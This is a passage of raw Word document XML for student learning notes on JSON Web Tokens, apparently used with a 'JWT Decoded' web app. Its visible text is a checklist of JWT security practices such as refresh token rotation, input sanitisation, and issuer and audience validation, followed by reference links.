                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement refresh token rotation for long-lived sessions</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sanitise all user input to prevent XSS token theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate issuer (iss) and audience (aud) claims on the server</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Keep tokens small — only include claims you actually need</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D1B3E" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7A849C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Further study: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="7A849C"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt.io (live debugger + library list)  •  RFC 7519 (JWT specification)  •  OWASP JWT Security Cheat Sheet  •  auth0.com/learn/json-web-tokens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BDA" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="0" w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7A849C"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7A849C"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7A849C"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  JWT Decoded — jwt-decoded-app.html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CBDA" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="0" w:before="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="0D1B3E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">JWT DECODED — Student Learning Notes</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:iCs/>
        <w:color w:val="7A849C"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">          Use alongside the JWT Decoded interactive web app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D1B3E"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="280"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0D1B3E"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:before="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0D1B3E"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="160"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0D1B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2026-04-12T06:33:28.100Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-12T06:33:28.100Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>